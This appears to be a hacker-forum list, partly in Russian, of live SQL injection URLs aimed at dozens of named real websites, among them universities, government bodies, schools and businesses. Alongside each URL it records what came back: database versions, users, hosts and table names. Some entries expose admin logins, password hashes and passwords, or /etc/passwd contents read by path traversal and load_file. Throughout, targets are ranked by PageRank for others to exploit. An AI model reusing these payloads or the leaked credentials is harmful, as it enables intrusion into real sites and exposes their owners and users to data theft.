Wide Web Server:/Library/WebServer:/usr/bin/false _eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false _cvs:*:72:72:CVS Server:/var/empty:/usr/bin/false _svn:*:73:73:SVN Server:/var/empty:/usr/bin/false _mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false _sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false _qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false _cyrus:*:77:6:Cyrus Administrator:/var/imap:/usr/bin/false _mailman:*:78:78:Mailman List Server:/var/empty:/usr/bin/false _appserver:*:79:79:Application Server:/var/empty:/usr/bin/false _clamav:*:82:82:ClamAV Daemon:/var/virusmails:/usr/bin/false _amavisd:*:83:83:AMaViS Daemon:/var/virusmails:/usr/bin/false _jabber:*:84:84:Jabber XMPP Server:/var/empty:/usr/bin/false _xgridcontroller:*:85:85:Xgrid Controller:/var/xgrid/controller:/usr/bin/false _xgridagent:*:86:86:Xgrid Agent:/var/xgrid/agent:/usr/bin/false _appowner:*:87:87:Application Owner:/var/empty:/usr/bin/false _windowserver:*:88:88:WindowServer:/var/empty:/usr/bin/false _spotlight:*:89:89:Spotlight:/var/empty:/usr/bin/false _tokend:*:91:91:Token Daemon:/var/empty:/usr/bin/false _securityagent:*:92:92:SecurityAgent:/var/empty:/usr/bin/false _calendar:*:93:93:Calendar:/var/empty:/usr/bin/false _teamsserver:*:94:94:TeamsServer:/var/teamsserver:/usr/bin/false _update_sharing:*:95:-2:Update Sharing:/var/empty:/usr/bin/false _installer:*:96:-2:Installer:/var/empty:/usr/bin/false _atsserver:*:97:97:ATS Server:/var/empty:/usr/bin/false _unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

http://www.missoulacvb.org/detail.php?id=-96+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3, 4,5,6,7,8,9,20/*

Database Version: 5.0.32-Debian_7etch10
Database name: missoulacvb_directory
User name: missoulacvb_dir@king.metasecure.net

--------------------------------------------------------------------------------------------------

http://www.thevalleypost.com/article.php?id=-536+union+select+1,2,unhex(hex(concat_ws(0x3a,user name,password))),4,5,6,7,8,9,0,11,12+from+users/*

Database Version: 4.1.14
Database name: thevalleypost
User name: thevalleypost@localhost

commercial-russia.ru - ТИЦ=10 + .ru
http://www.commercial-russia.ru/links.php?id=1/**/aNd/**/substring(version(),1,1)=5
ветка = 5

http://www.crjs.ru/en/news/news.php?newsid=-141+union+select+1,2,3,4,5,6,7,8,9,id+from+admin_t otal+--+

http://www.autoconmotorsports.com/news/News.php?NewsID=-55+union+select+1,2,3,4,5,6,7,8,9+/*+

http://anthenv.web.arizona.edu/Officers.php?Role=Treasurer&Bio=../../../../etc/passwd

http://www.nuclearblastusa.com/nb/v2/news/news.php?newsID=-625+union+select+1,2,3,4,5,6,7,8+/*+

http://www.jeffbucknum.com/news/News.php?NewsID=-20+union+select+1,2,3,4,5,6,7,8,9+/*+

http://www.farmaks.ru/rus/news/news.php?NewsID=-53+union+select+1,2,3,4+/*+

http://niet.com/message_info.php?id=273362+union+select+1,2,3,4,5, load_file(0x2f6574632f706173737764),7,8+from+mysql .user/*

Database Version: 5.0.45-log
Database name: nietmail
User name: john@lighttpd

--------------------------------------------------------------------------------------------

PR 6
http://www.shambhala.org/teachings/view.php?id=-131'+union+select+1,version(),3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,21/*

Database Version: 5.0.45
Database name: shambhalaweb
User name: shambhalaweb@localhost

[PR=4]
http://www.play-pb.com/sh_new.php?id=-244+union+select+1,2,concat_ws(0x3b,database(),ver sion(),user()),4--

playpb_marikoplaypb;4.1.22-standard;playpb@localhost

http://yugday.ru/stat/links.php?ID=1+anD+substring(version(),1,1)=4
версия 4
ТИЦ: 20

PGSQL

http://fotokala.ee/
baas.php?aktsioon=tegija&p2ring=&pilt=1+and+1=cast((select+current_user||chr(58)||v ersion())+as+int)

kala:PostgreSQL 8.1.11 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)

slb.ru PR 5 ТИЦ 275

http://slb.ru/page.php?code=-15+union+select +1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),databa se(),user()),11,12,13,14+--+

Version: 4.1.22
Database: slb_sql
User: slb@localhost

mayprint.ru

http://www.mayprint.ru/news_page.php?code=-20+UNION+SELECT+1,2,3,unhex(hex(concat_ws(0x3a,ver sion(),database(),user()))),5+--+

Version: 4.1.11-standard
Database: db_mayprint
User: mayprint@localhost.localdomain

burenki.ru

http://www.burenki.ru/view_news.php?id=-5+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5+--+

Version: 5.0.67-log
Database: u30138
User: u30138@10.10.223.209

кому интересно - раскручивайте

http://www.vijesti.co.me/index.php?id=-270622/**/union/**/select/**/1,2,3,4,5,6,database(),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23/*

gorsovet.miass.ru - - - Собрание депутатов Миасского городского округа ТИЦ = 10
http://www.gorsovet.miass.ru/com.php?id=1/**/anD/**/substring(version(),1,1)=5/*&ident=0
ветка - 5

http://www.windbrake.us/news.php?ID=-824+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6--

http://www.myownsite.us/blog/index.php?id=-30+union+select+concat_ws(0x3a,version(),database( ),user())

http://diq.usach.cl/proyecto.php?id=-11+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8--
portal@www.ecdp.die.usach.cl:diq:5.0.27

http://www.naswassurance.org/books_of_interest.php?page_id=-7+union+select+1,2,group_concat(username,0x3a,pass word),4,5,6,7+from+users/*

Database Version: 4.1.22
Database name: nasw1_asi
User name: nasw1_admin@216.81.70.2

http://www.car-man.cl/contactoscar.php?con=1&id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11,12,13,14,15--
sanagust_1@localhost:sanagust_1:5.0.81-community

eda
http://www.ptsem.edu/SeminaryRelations/alumni_ae/profile.php?p_id=-318+union+select+1,2,3,4,5,TABLE_NAME,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22+from+INFORMATION_ SCHEMA.TABLES--

pg

artinside.ru PR-4 ТИЦ-30

http://artinside.ru/work.php?code=-28+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versi on(),database(),user()),9,10,11+--+

version: 5.0.67-log
database: u22850
user: u22850@10.10.223.212

http://scott.buffington.me/index.php?action=show&id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6--

scott-woah@localhost:scottbuffme:5.0.51a-3ubuntu5.4-log

http://scott.buffington.me/index.php?action=show&id=-1+union+select+1,2,3,load_file(0x2F6574632F7061737 37764),5,6--

http://scott.buffington.me/index.php?action=show&id=-1+union+select+1,2,3,concat_ws(0x3a,user,password, file_priv),5,6+from+mysql.user--
root:*BEAE739996CC41EE7EA0C8D35AE2270BE5D6AE1D:Y

_ttp://expo.mtpp.org/news.php?id=-92+union+select+1,2,3,4,version(),6,concat(@@versi on_compile_os,0x2f2f2f,database(),0x2f2f2f,user()) ,8,9--
portbld-freebsd4.8///expo///root@zvm27.host.ru
4.0.27

_ttp://expo.mtpp.org/news.php?id=-92+union+select+1,2,3,4,concat_ws(0x3a3a3a,name,pa ss),6,7,8,9+from+users+limit+0,1--
Администрато р:::olga

тИц = 110
http://vector-images.com/heraldry.php?id=-136+union+select+1,2,3+--
3 поля


http://vector-images.com/heraldry.php?id=-136+union+select+1,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),3+--
version:4.0.24_Debian-5
db:rocich
user:rocich@localhost
OS: pc-linux-gnu


that's all :( because 4.0.24

PR 6
http://culture.ana-mpa.gr/view5.php?id=-3693+union+select+unhex(hex(load_file(0x2f6574632f 706173737764)))+from+mysql.user/*

Database Version: 4.1.8-standard
Database name: ape_culture_new
User name: root@localhost

PR 8
http://www.culturalpolicies.net/web/profiles-news.php?cid=-1340+union+select+version(),2/*

Database Version: 5.0.32-Debian_7etch11-log
Database name: DB4i2kyq4AS5
User name: KDnvJJMcs9Lq@localhost

http://www.jckc.gov.cn/zwgk01_v.php?id=1+union+select+1,concat(0x3,passwo rd,database(),version(),user()),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+fro m+mysql.user

jlkc2009 5.0.75-0ubuntu10cress@localhost

http://www.universite-toplum.org/text.php3?id=2+union+select+1,2,concat(0x3,version (),user(),database()),4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25+limit+1,1/*

4.0.24pleksus@localhostJOURNAL_ut

www.warrencountypa.net
http://www.warrencountypa.net/current/com.php?ID=1/**/anD/**/1=7%20/**/unIOn/**/seLEcT/**/1,version(),3,4,5,6
version - 5.0.51a-log
user - warrenco@boscgi0702.eigbox.net
database - warrenco_elected

http://sdo.altstu.ru/showbook.php?id=-7+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9--

5.1.25-rc-log:_secna_distancer@localhost:_secna_astu_distanc e



http://www.diafilms.ru/index.php?id=7&type=list&gr=0&pg=-22+union+select+1,2,3,4,5,unhex(hex(concat_ws(0x3a ,user(),version(),database()))),7,8,9,10,11,12,13, 14,15,16,1,18,19,20,21,22,23+--

1gb_diafilm@10.0.1.18:4.1.13a-nt-max-log:1gb_diafilm
ТИЦ: 90




http://www.sl.ru/print.phtm?id=7+and+substring(version(),1,1)=3

3 ветка
ТИЦ: 550

_ttp://www.saintstrust.co.uk/news.php?id=-20+union+select+1,2,3,4,5,concat_ws(0x3a,username, password,0x203d20,0x747275737461646d696e),@@versio n,8+from+t_user+limit+1,1--
james:b4cc344d25a2efe540adbf2678e2304c: = :trustadmin

5.0.45

http://swarzedzki.gminny.pl/go.php?page=nr&nr=1+union+select+concat_ws(0x3,version(),user(),d atabase()),2,3,4,5,6,7

5.0.22 watra_mgsw_user@localhost watra_mgsw

http://www.excellentgloballimeira.com.br/com.php?id=1/**/anD/**/1=8/**/uniON/**/seLEcT/**/1,2,3,version(),user(),database(),7,8+--+
version - 5.0.67-community
user - excellentgloba
database - excellentgloba@200.234.200.155

http://www.christopheracademy.com/content.php?id=39+union+select+1,concat_ws(0x3a,us er(),version(),database()),3,4,5,6,7,8,9,10,11,12, 13,14,15,16--

Database Version: 4.1.22-standard
Database name: christop_christop
User name: christop_christo@localhost

PR 3

_ttps://www.lincolnbigsecurity.co.uk/news.php?ID=-20+union+select+version(),concat_ws('$$$',id,email ,password),3+from+users+limit+1,1--

4.1.22-log
2$$$shaun.Barnett@Lincolnbig.co.uk$$$2905

lennickaberman.com pr4
Консультанты чтоле какието -_-
http://www.lennickaberman.com/online_store/product_details.php?cid=22&pid=999+UNION+ALL+SELECT+null,null,null,null,null, null,null,null,null,CONCAT(0x3C7363726970743E616C6 572742827,Version(),0x3a,user(),0x27293C2F73637269 70743E),null,null,null,null+--+
Database: 4.1.25-Debian_m
User: db35543@64.13.192.14

www.transera.com.ua
http://www.transera.com.ua/forum/forum.php?id=9+union+select+1,2,3,4,concat_ws(0x3a ,version(),user(),database()),6,7
Version():5.0.81-community
User():diving_user@localhost
Database:diving_transera

www.tavrida-school.com
http://www.tavrida-school.com/shownews.php?news_code=59+union+select+1,2,concat_ ws(0x3a,version(),user(),database()),4,5,6,7
Database Version: 4.0.27-max-log
Database name: geokon10_db02
User name: geokon10_db02@v41.valuehost.ru

infolex.lt
LEGAL PORTAL
http://infolex.lt/portal/viewphoto.asp?strid=32827&eilnr=(select+@@version)
Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

_ttp://www.mwnuk.co.uk/news.php?id=-20+union+select+1,concat_ws(0x3a,username,password ,clientID),3,@@version,5,6,7,8+from+a_useradmin--

finish:handle13:105
5.0.45-log

http://silurus.snowhall.com/wcategory.php?ID=6+union+select+1,2,3,concat_ws%28 0x3a,version%28%29,user%28%29,database%28%29%29,5, 6,7,8,9,10--

5.0.83-log:demosnowhall@localhost:silurus_snowhall_com

http://www.clasificanes.com/wcategory.php?ID=17+union+select+1,2,3,concat_ws%2 80x3a,version%28%29,user%28%29,database%28%29%29,5 ,6,7,8,9,10--

5.0.77-community-log:clasifi_monica@localhost:clasifi_anuncios

http://www.neftocard.ru/about/news/news.php?newsid=-9+union+select+1,2,3,4,5,6,7,8+/*+

http://www.hamelinpaperbrands.co.uk/news/news.php?newsid=-8+union+select+1,2,3,4,5,6,7,8+/*+

http://silvercast.ru/index.php?page=3&viewtext=-2+union+select+1,group_concat(table_name)+from+inf ormation_schema.tables+--+

http://www.ecocity.gr/main.php?cat=54&art=-7+union+Select+group_concat(table_name),2,3,4,5+fr om+information_schema.tables+group+by+table_schema +/*+

vitecmm.com pr5
VITEC Multimedia, a pioneer and a worldwide leader in the digital video domain since 1988.
http://www.vitecmm.com/contentv2.php?theme=null+union+all+select+null,nul l,null,null,concat_ws(0x2f,0x3C7363726970743E616C6 572742827,Version(),Database(),User(),0x27293C2F73 63726970743E),null,null,null,null,null,null+--+

vitecv2@localhost/4.0.17-log/vitec

сайт весь в дырках :(

http://www.egyptiansociety.net/media/index.php?action=showpic&cat=8&pic=59&pic=-1/**/union/**/all/**/select/**/1,1,1,concat(user(),0x202D20,database(),0x202D20,V ersion()),null,1,null,0,0,1,0,0,1,0,0,1,null,null, 0,0,1,1

abahei_abahei@localhost - abahei_egyptiansocietyphotokorn - 5.1.30

www.miamacdonald.com - PR=4
http://www.miamacdonald.com/a.php?id=1/**/anD/**/1=7%20/**/uniON/**/seLEcT/**/1,version(),3,4,5,6/*
version - 4.1.22
user - miamacdonald@localhost
database - miamacdonald

Arizona State Legislature
http://www.azleg.gov/Bills.asp?FirstBill=HB2001&LastBill=HB2050'+OR+1=(select+@@version)--
Microsoft SQL Server 2005 - 9.00.3159.00 (Intel X86) Mar 23 2007 16:15:11 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

http://shubarov.ru/photo/index.php?action=showpic&cat=8&pic=59&pic=-1/**/union/**/all/**/select/**/1,1,1,concat(user(),0x202D20,database(),0x202D20,V ersion()),null,1,null,0,0,1,0,0,1,0,0,1,null,null, 0,0,1,1

shubarov_ru@212.0.65.74 - shubarov_ru - 5.1.24-rc-log

http://jkf.israphotos.com/index.php?action=showpic&cat=8&pic=59&pic=-1/**/union/**/all/**/select/**/1,1,1,concat(user(),0x202D20,database(),0x202D20,V ersion()),null,1,null,0,0,1,0,0,1,0,0,1,null,null, 0,0,1,1/*

dbo191724041@74.208.16.167 - db191724041 - 4.0.27-max-log

http://www.vecxel.com/rain/sermon/sermon_order.php?sermon_id=4+union+select+1,concat (version(),database(),user()),3,4,5,6,7,8

Database Version: 5.0.67.d7-ourdelta-log
Database name: latterrain
User name: latterrain@208.109.14.88

PR2

_ttp://www.examen.biz/book.php?id=-1859+union+select+1,2,3,database(),5,6,7,8,9,10,ve rsion(),12,user(),14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31+from+user+--+
4.0.27-log
examen@pm1.zenon.net
examen

http://www.usaonlinedatingsite.com/p.php?id=-1%20UNION%20SELECT,1,2,3,4,concat_ws%280x3a,login, password%29,6,7,8,9,10,11,12,13,14,15,16,17,18%20F ROM%20usaonli_db1.frm_users%20LIMIT%200,1--


5 версия...

http://trudovoy.webworks.ru domin_gallery.php?did=1;select+cast(version()+as+i nt)

PostgreSQL 8.2.3 on x86_64-unknown-linux-gnu, compiled by GCC gcc (GCC) 4.1.1 20061011 (Red Hat 4.1.1-30)

iwsi.org pr3
The International Women's Studies Institute.
http://www.iwsi.org/pages.cfm?ID=null union all select null,null,null,null,null,concat_ws(0x2f,0x3C736372 6970743E616C6572742827,version(),user(),database() ,0x27293C2F7363726970743E),null,null,null,null,nul l,null,null,null,null,null
4.1.20-log/eboneparth@216.119.112.191/iwsicontent

http://velosport.ru/catalog/?cid=3&id=55+UNION+SELECT+1,2,3,concat_ws(0x3a,user(),ver sion(),database())--

w_hbsp@195.42.160.50:4.1.20-1.gms:w_hbsp

ТИЦ: 230




http://ckpt.ru/newsdetails.html?id=-97+union+select+1,2,concat_ws(0x3a,user(),version( ),database()),4,5,6,7--


exportbe_ckpt@v15.valuehost.ru:4.0.27-max-log:exportbe_ckpt

ТИЦ: 20
PR: 4

Смог найти префикс, и всё :o
http://www.st-art.ru/?go=catalog&cat_id=1+UNION+SELECT+1,concat(newsid,0x3a3a3a,new stext),3,4+from+im_news/*
Ну и стандартный набор
http://www.st-art.ru/?go=catalog&cat_id=1+UNION+SELECT+1,concat(user(),0x3a3a3a,dat abase(),0x3a3a3a,version()),3,4+from+im_news/*

im_st-art_ru@zvm12.host.ru:::im_st-art_ru:::4.0.27-log
Ну и из кэша гугла путь
/bhome/part1/02/start/st-art.ru/www/main.php

antrimhistory.net pr4
The Glens of Antrim Historical Society
http://www.antrimhistory.net/content.php?cid=50+UNION+SELECT+null,null,null,nul l,null,concat_ws(0x2f,0x3C7363726970743E616C657274 2827,version(),user(),database(),0x27293C2F7363726 970743E),null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null+LIMIT+ 1,1/*
4.1.22-Max/u1001104_goahs@172.16.3.36/db1001104_goahs

www.agidev.com - PR=4
http://www.agidev.com/articles/a.php?id=1/**/and/**/1=7%20/**/uniON/**/seLeCT/**/1,2,3,version(),5/*
version - 5.0.45-log
user - agidev_client@apache2-emu.wolverine.dreamhost.com
database - agidev_site
os - unknown-linux-gnu
http://www.agidev.com/articles/a.php?id=1/**/and/**/1=7%20/**/uniON/**/seLeCT/**/1,2,3,email,5/**/FROM/**/people/**/LIMIT/**/0,1

pr 3 www.onoci.net

http://www.onoci.net/virilio/pages_uk/artistes/fiche.php?id=-25%20union%20select%201,version(),3,4,5,6,7,8,9,us er(),1,2,3,4,5,6,7,8,9,0,1,2,3,4,5&th=2&img=1

http://www.onoci.net/virilio/admin/ - админка

5.0.45-log,onoci@localhost


Pr 3 laitdbac.com

http://laitdbac.com/fiche.php?id=-10%20union%20select%201,version(),3,4,5,6,7,8,9,0

database,user,version -
::::dbo201044235@212.227.119.175::::db201044235::: :5.0.51a-log

http://refoweb.net/getpay.php?id=100043+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13

Вывода нет.. Но ветка пятая
http://refoweb.net/getpay.php?id=100043+and+2=1+union+select+1,2,3,4, 5,6,version(),8,9,10,11,12,13+from+information_sch ema.tables

Яндекс тИЦ 80
Google PageRank 2

ЗЫ: кидало партнёрка. У самого есть акк там, бабло не выводят естесс-но..

cifrovik.biz pr3
Каталог цифровой техники.
http://www.cifrovik.biz/news.php?news_id=999+union+all+select+concat_ws(0x 2f,version(),user(),database())
5051acommunity/cifrovik_cifrovi@localhost/cifrovik_cifrovi
http://www.cifrovik.biz/news.php?news_id=999+union+all+select+concat_ws(0x 2f,user_group,user_name,user_password)+FROM+cifrov ik_cifrovi.cpg148_users+limit+1,1
1/Helen/2281f5c898351dbc6dace2ba201e7948

http://www.lbpost.com/specialreport.php?id=-1+union+select+1,2,concat_ws(0x3a,username,passwor d)+from+users2--

Database Version: 5.0.77
Database name: gengop
User name: gengop@localhost

sevntu.ru
http://sevntu.ru/photos.php?s=-101+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,concat_ws(0x3a,version(),database(),user()), 18,19,20,21,22,23,24,25,26,27,28,29
Version():5.0.83
Database():bankcard_base
User():bankcard@localhost

Почта России. Главный центр магистральных перевозок почты.
http://www.gcmpp.ru/zona/pravovie_documenti/pravovie_documenti.php?action=view&cat=2+Union+Select+1,2,concat_ws(0x3a,database(),u ser(),version()),4,5,6
gcmpp:gcmpp@zvm2.host.ru:4.0.27-log

http://www.realestinternational.com/russian/direct.line.php?id=-1/**/UniON/**/alL/**/SeLecT/**/1,CONcAt(0x3a,Admin_id,0x3a,username,0x3a,password ,0x3a,email,0x3a,mobile),3,4,5,6,7,8/**/FROM/**/ri_admin+--+

PR 7
http://csulb.edu/divisions/students/calendar/eventlist.php?list=id&id=-650+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,vers ion(),database(),user()),9,0,11,12,13,14,15,16/*

4.0.21-log:calendar:caluser@skua-priv1.its.csulb.edu

_ttp://infores.mpt.gov.by/ir/database/view_ir.php?id=-2182+union+select+1,2,3,version(),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,database(),20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65--
4.1.22-log
inforesipps

http://www.nightmist.ca/news.php?news_id=50+UNION+SELECT+1,2,3,4,5,6,7+LIM IT+1,1/*

Database Version: 4.1.14
Database name: nightmist
User name: a0006676@localhost

http://www.dlink.lt/news.php?id=1;select+cast(version()||chr(58)||curr ent_user+as+int)

PostgreSQL 8.3.7 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2:dlink

http://www.mcbainscooper.com/news/news.php?newsid=-106'+union+select+1,2,3,4,concat_ws(0x3a3a,adminid ,username,password),6,7,8,9,10,11,12,13,14,15,16+f rom+newsadmin+--+

http://www.els.salford.ac.uk/news/news.php?newsid=-16+union+select+1,2,3,database(),5,6,7,8+/*+

http://www.accommodation.salford.ac.uk/cms/news/article/index.php?id=-4+union+select+1,2,3,4,5,6+/*+

http://www.business-services.salford.ac.uk/cms/news/article/?id=-24+union+select+1,2,3,4,5,6+/*+

http://www.rgc.salford.ac.uk/cms/news/article/index.php?id=-147+union+select+1,2,3,4,5,6+/*+

http://www.mams.salford.ac.uk/mams/news/article/index.php?id=-35+union+select+1,2,3,4,5,6+/*+

http://access.fsee.salford.ac.uk/bb/view_forum.php?forumid=-1+union+select+1,2,3,4,5+/*+

http://www.scri.dev.salford.ac.uk/scri/news/article/index.php?id=-39+union+select+1,2,3,4,5,6+/*+

http://www.bri.salford.ac.uk/bri/news/article/index.php?id=-18+union+select+1,2,3,4,5,6+/*+

http://www.analytical-services.salford.ac.uk/cms/news/article/?id=-3+union+select+1,2,3,4,5,6+/*+

http://www.sege.salford.ac.uk/cms/news/article/?id=-5+union+Select+1,2,3,4,5,6+/*+

PR 4
http://www.enlacemusical.com/c.php?id=-2561+union+select+1,2,3,4,5,concat_ws(0x3a,databas e(),version(),user()),7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
PR 3
http://www.grainworkstudio.com/project.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7--
PR 3
http://www.eat-in.co.za/static/news/story.php?id=-84+union+select+1,aes_decrypt(aes_encrypt(concat_w s(0x3a,user,password),1),1),3,4,5,6,7,8,9,10,11+fr om+mysql.user+limit+0,1--
http://www.hanfield.org/news/story.php?id=-84+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6--
http://www.greenhillsschool.org/news/story.php?id=-84+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5,6,7,8--
http://www.sanfordschool.org/news/story.php?ID=-56+union+select+concat_ws(0x3a,database(),version( ),user()),2,3,4,5,6--

themq.com pr4
The MQ is the official college newspaper of Muir College at the University of California, San Diego.
http://www.themq.com/index.php?articles_id=null&issue=null+union+all+select+null,null,null,null,co ncat_ws(0x2f,0x3C7363726970743E616C6572742827,vers ion(),user(),database(),0x27293C2F7363726970743E)+--+
4.0.27-max-log/dbo184405665@74.208.16.28/db184405665

http://www.ccsaar.de/fr/congresscentrum/index.php?id=-19+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,u ser(),database(),version()),11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25--

ccsaar_fr_usr@localhost:ccsaar_fr:5.0.45
PR 4

PR5
http://www.njmp.com/news/news.php?newsID=-96'+union+select+1,2,3,4,5,6,7,8,9,10+/*+

PR4
http://www.bce009.ru/staff.php?act=adm_cat&cat=-5+union+select+group_concat(column_name)+from+info rmation_schema.columns+where+table_name=0x43686F69 63653241646D+--+

PR3
http://www.thermopol.ru/news_one.php?news_id=-224+union+select+1,2,3,4,table_name,6,7,8,9,10,11, 12,13,14,15,16,17+from+information_schema.tables+--+

PR1
http://svir.ru/catview.php?tid=-34+union+select+1,2,3,table_name,5,6,7,8,9+from+in formation_schema.tables+--+&nm=%C3%EE%F0%E8%E7%EE%ED%F2%E0%EB%FC%ED%FB%E5

PR4
http://www.ptfinans.ru/page.php?lev1=-7+union+Select+1,2,3,4,5,6,7,8,9,10+--+

PR3
http://www.canadianreformedchurchchilliwack.org/page.php?id=-74+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16+from+information_schema.tables+--+

http://www.trsongs.ru/trtext_songs.php?id=319+union+select+0,1--
blind

http://www.redfitness.com.ar/document.php?ID=-340+union+select+1,2,3,concat_ws(0x3a,user(),datab ase(),version()),5,6,7,8,9--
redfitne_fernand@localhost:redfitne_redfitness:4.1 .22-standard-log
PR:3
Тиц:10

blind

http://www.evlka.de/content.php?contentTypeID=4&id=4639+and+substring(version(),1,1)=5--

5 ветка

PR:5

http://www.slsensor.com/stat.php?id=99999+union+select+1,2,3,4,5,6,concat_ ws(0x3a,user(),version(),database()),7,8--
web48@localhost:5.0.32-Debian_7etch8-log:usr_web48_1


http://www.lovato.ru/publications.php?id=-5+union+select+1,2,3,concat_ws(0x3a,user(),version (),database()),5,6--
Lovato@www.tnn.ru:5.1.30-community:lovato

tcmpro.us
Association for the promotion of Chinese medicine. Это сопсно все что там есть на англицком, Китайцы детектед ))
http://tcmpro.us/more_news.php?articles_id=null+union+all+select+nu ll,null,null,concat_ws(0x2f,0x3C7363726970743E616C 6572742827,version(),user(),database(),0x27293C2F7 363726970743E),null+--+
http://tcmpro.us/more_news.php?articles_id=null+union+all+select+nu ll,null,null,concat_ws(0x20,admin_email_address,ad min_password),null+FROM+admin+LimiT+0,1+--+
4.0.17/binwang_tcm@204.13.155.66/binwang_tcm
admin@tcmpro.com

http://www.kavkazsport.com/?do=view_sportsman_info_cat_global&id=-184+union+select+concat(password,0x3a,login),2+fro m+users--

http://www.concom.kharkov.net/phpAds/viewbanner.php3?bannerID=100%20union%20select%201, 2,concat_ws(0x3a,ver sion(),data base(),user()),4,5,6,7,8,9,10,11
баннеры www.kharkov.ua, у которого тИЦ:8900.
качаем файлик и смотрим содержимое

pr5
madzari@cgi1402.int.bizland.net : madzari : 5.0.83-log
http://www.tumbamadzari.org.mk/en/gallery.php?id=-6+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4,5,6,7,8,9--

j-source.ca pr5
The Canadian Journalism Project.
http://www.j-source.ca/english_new/category.php?catid=243+and+substring(version(),1,1 )=5
5.0.81
вывода не добился

ЮНИО-Р: Отдых с пользой для ума - детский отдых за границей (Кранево, Болгария, побережье Черного Моря)

junio-r.ru

URL:
http://www.junio-r.ru/settings/

POST:
smid=%27%2Cinterests%3Dconcat_ws%280x3a%2Cuser%28% 29%2Cdatabase%28%29%2Cversion%28%29%29%2F%2A&snick=&surl=&sicq=&sbirth_d=1&sbirth_m=1&sbirth_y=1930&ssex=u&scity=&sinterests=

RESULT:
junio-r@localhost:junio-r:4.1.16

http://www.lakewoodathens.com/page/about03-a.php?id=1/**/anD/**/1=7/**/uniON/**/seLEcT/**/1,2,3,4,version(),user(),7,8,9,database(),1,2,3,4/*
version - 4.1.25-Debian_mt1

http://www.respiromed.hu/?page=category&mc=-2+union+select+1,2,unhex(hex(user())),4,5--
Database Version: 4.1.11-pro-gpl
Database name: respiromedhu
User name: respiromedhu@ghost.hu

http://www.respiromed.hu/?page=category&mc=-2+union+select+1,2,3,4,5+from+login--

PR 2

http://www.boutiques-de-gestion.com/bg/acc.php?id=-1+union+select+concat_ws(0x3a,user(),version(),dat abase())--
bdgcom@localhost:5.0.44-log:bdgcom

результат смотреть через код страници

PR 6

http://stjohnbrebeuf.com/page.php?id=-21+union+select+1,2,3,4,5,6,7,group_concattable_na me),9,10,11,12,13,14,15,16,17,18,19+from+informati on_schema.tables+--+

http://www.ronfeuler.nl/htm/page.php?id=-355+union+select+1,table_name,3,4,5,6,7,8,9,10,11, 12,13,14+from+information_schema.tables+--+

http://auto-kran.ru/podrobno.php?id=-28+union+select+1,2,3,4,table_name+from+informatio n_schema.tables+--+

http://dagdoska.ru/post.php?id_post=-163+union+select+1,2,group_concat(login,0x3a,passw ord,0x3a3a,email),4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19+from+users+--+

http://www.mirpr.ru/articles/?article_id=-38+union+select+1,2,group_concat(user_id,0x3a,user _name,0x3a,user_pass,0x3a,user_bio_status,0x3a,use r_newpassword),4+from+mirpr_forum_users+--+

http://www.kriz-zivota.com/tekstovi.php?id=-1417+union+select+1,2,3,concat_ws(0x3a,user(),vers ion(),database()),5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42--
kriz-zivota@localhost:5.0.51a-3ubuntu5.4:kriz_zivota

http://www.kriz-zivota.com/tekstovi.php?id=-1417+union+select+1,2,3,concat_ws(0x3a,nick,pass), 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42+from+korisnik--



PR 4


